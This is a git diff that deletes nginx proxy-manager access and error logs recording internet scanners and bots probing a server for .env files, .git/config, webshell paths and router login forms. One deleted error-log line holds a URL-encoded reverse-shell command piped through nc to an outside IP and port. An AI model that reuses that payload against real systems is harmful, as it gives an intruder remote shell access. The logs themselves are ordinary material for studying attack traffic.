[Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:21:17:22 +0000] 404 - GET http 172.237.28.60 "/form.html" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "curl/8.1.2" "-" -[10/Sep/2025:21:17:22 +0000] 404 - GET http 172.237.28.60 "/upl.php" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" -[10/Sep/2025:21:17:22 +0000] 404 - GET http 172.237.28.60 "/t4" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" -[10/Sep/2025:21:17:22 +0000] 404 - GET http 172.237.28.60 "/geoip/" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:21:17:23 +0000] 404 - GET http 172.237.28.60 "/1.php" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:21:17:23 +0000] 404 - GET http 172.237.28.60 "/systembc/password.php" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:21:17:23 +0000] 404 - GET http 172.237.28.60 "/password.php" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:21:32:59 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:21:35:56 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:21:35:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:36:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:36:08 +0000] 404 - GET http 172.237.28.60 "/sitemap.xml" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:21:36:12 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:21:37:04 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:21:37:04 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:21:39:29 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:21:46:47 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:46:47 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:21:46:48 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:21:51:31 +0000] 404 - GET http apiv4.9hits.com "/test" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" -[10/Sep/2025:21:53:20 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:22:02:25 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:02:26 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:02:27 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:02:27 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[10/Sep/2025:22:16:01 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:22:19:39 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:19:39 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:19:40 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:22:26:08 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:26:08 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:26:09 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:22:32:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:32:51 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:32:51 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:32:52 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[10/Sep/2025:22:37:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:37:01 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:37:01 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:37:01 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[10/Sep/2025:22:39:15 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[10/Sep/2025:22:40:31 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:22:40:31 +0000] 405 - POST http 172.237.28.60 "/" [Client 10.89.0.8] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:22:53:01 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:53:02 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:53:02 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:23:01:29 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:01:29 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:23:01:29 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:23:03:47 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:23:03:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:23:10:36 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:10:37 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:10:37 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:23:10:38 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[10/Sep/2025:23:13:53 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:23:21:17 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:23:24:38 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:24:39 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:23:24:39 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:23:26:48 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:26:49 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:23:26:49 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:23:54:02 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:54:02 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:23:54:03 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:23:55:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:04:07 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:04:08 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:04:08 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[11/Sep/2025:00:09:43 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[11/Sep/2025:00:11:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:11:10 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:11:11 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:11:12 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[11/Sep/2025:00:13:15 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:13:15 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:13:16 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[11/Sep/2025:00:15:10 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:15:11 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:15:11 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[11/Sep/2025:00:19:14 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:19:14 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:19:15 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[11/Sep/2025:00:25:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:25:35 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:25:35 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:25:36 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[11/Sep/2025:00:29:46 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" -[11/Sep/2025:00:32:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:32:18 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:32:19 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:32:19 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[11/Sep/2025:00:34:39 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" diff --git a/logs/2025-09-11/fallback_error.log b/logs/2025-09-11/fallback_error.log deleted file mode 100644 index e1289f2..0000000 --- a/logs/2025-09-11/fallback_error.log +++ /dev/null @@ -1,46 +0,0 @@ -2025/09/10 07:27:12 [error] 189#189: *2 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=mkfifo%20%2Ftmp%2Ff%3B%20%2Fbin%2Fsh%20-i%20%3C%20%2Ftmp%2Ff%202%3E%261%20%7C%20nc%20196.251.84.66%206667%20%3E%20%2Ftmp%2Ff HTTP/1.1", host: "172.237.28.60:80" -2025/09/10 08:24:57 [alert] 194#194: *1013 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 09:01:08 [error] 195#195: *1018 open() "/var/www/html/login" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "84167165-jh888-17.tcr195p888.com" -2025/09/10 09:34:50 [error] 194#194: *1024 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 09:34:51 [error] 194#194: *1025 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/10 09:57:39 [error] 194#194: *1041 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 11:13:47 [alert] 195#195: *2067 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 11:13:55 [error] 194#194: *2071 open() "/var/www/html/security.txt" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /security.txt HTTP/1.1", host: "172.237.28.60" -2025/09/10 11:30:45 [error] 194#194: *2080 open() "/var/www/html/portal/redlion" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /portal/redlion HTTP/1.1", host: "172.237.28.60" -2025/09/10 12:25:02 [error] 194#194: *2096 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "172.237.28.60" -2025/09/10 12:26:26 [alert] 194#194: *3016 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 12:26:51 [error] 195#195: *3017 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "172.237.28.60" -2025/09/10 13:23:16 [error] 194#194: *3022 open() "/var/www/html/actuator/health" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /actuator/health HTTP/1.1", host: "172.237.28.60" -2025/09/10 13:47:48 [error] 2460#2460: *3029 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 16:00:23 [error] 2460#2460: *3048 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 16:59:43 [error] 2460#2460: *3071 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 18:33:41 [alert] 2461#2461: *4114 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 18:33:55 [error] 2460#2460: *4118 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "172.237.28.60" -2025/09/10 19:31:44 [error] 2460#2460: *4130 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 19:41:47 [alert] 4873#4873: *5146 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 19:51:44 [error] 4873#4873: *5154 open() "/var/www/html/security.txt" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /security.txt HTTP/1.1", host: "172.237.28.60" -2025/09/10 20:06:06 [error] 4874#4874: *5157 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 20:18:50 [error] 4874#4874: *5159 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 20:26:46 [error] 4874#4874: *5170 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:22 [error] 4874#4874: *5180 open() "/var/www/html/form.html" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /form.html HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:22 [error] 4874#4874: *5181 open() "/var/www/html/upl.php" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /upl.php HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:22 [error] 4874#4874: *5182 open() "/var/www/html/t4" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /t4 HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:22 [error] 4874#4874: *5183 "/var/www/html/geoip/index.html" is not found (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /geoip/ HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:23 [alert] 4874#4874: *6196 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 21:17:23 [error] 4873#4873: *6197 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:23 [error] 4873#4873: *6198 open() "/var/www/html/systembc/password.php" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /systembc/password.php HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:23 [error] 4873#4873: *6199 open() "/var/www/html/password.php" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /password.php HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:35:57 [alert] 4873#4873: *7212 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 21:36:08 [error] 4874#4874: *7218 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:37:04 [error] 4874#4874: *7223 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:37:04 [error] 4874#4874: *7224 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:51:31 [error] 4873#4873: *7230 open() "/var/www/html/test" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET http://apiv4.9hits.com/test HTTP/1.1", host: "apiv4.9hits.com" -2025/09/10 22:02:27 [error] 4874#4874: *7235 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/10 22:32:52 [error] 4874#4874: *7248 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/10 22:37:01 [error] 4874#4874: *7252 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/10 22:40:31 [error] 4874#4874: *7254 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 23:03:47 [error] 4873#4873: *7271 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 23:10:38 [error] 4873#4873: *7275 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/11 00:11:12 [error] 4873#4873: *7299 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/11 00:25:36 [error] 4874#4874: *7315 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/11 00:32:19 [error] 4874#4874: *7320 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" diff --git a/logs/2025-09-11/npm-app-journal.log b/logs/2025-09-11/npm-app-journal.log deleted file mode 100644 index 5bf09e5..0000000 --- a/logs/2025-09-11/npm-app-journal.log +++ /dev/null @@ -1,2 +0,0 @@ -Sep 11 08:40:15 debian-jp-tyo-3 npm-app[1721]: [9/10/2025] [11:40:15 PM] [SSL ] › ℹ info Renewing SSL certs expiring within 30 days ... -Sep 11 08:40:15 debian-jp-tyo-3 npm-app[1721]: [9/10/2025] [11:40:15 PM] [SSL ] › ℹ info Completed SSL cert renew process diff --git a/logs/2025-09-11/npm-app-journal_09:39:21.log b/logs/2025-09-11/npm-app-journal_09:39:21.log deleted file mode 100644 index 5bf09e5..0000000 --- a/logs/2025-09-11/npm-app-journal_09:39:21.log +++ /dev/null @@ -1,2 +0,0 @@ -Sep 11 08:40:15 debian-jp-tyo-3 npm-app[1721]: [9/10/2025] [11:40:15 PM] [SSL ] › ℹ info Renewing SSL certs expiring within 30 days ... -Sep 11 08:40:15 debian-jp-tyo-3 npm-app[1721]: [9/10/2025] [11:40:15 PM] [SSL ] › ℹ info Completed SSL cert renew process diff --git a/logs/2025-09-11/npm-db-journal.log b/logs/2025-09-11/npm-db-journal.log deleted file mode 100644 index 6ba17d7..0000000 --- a/logs/2025-09-11/npm-db-journal.log +++ /dev/null @@ -1 +0,0 @@ --- No entries -- diff --git 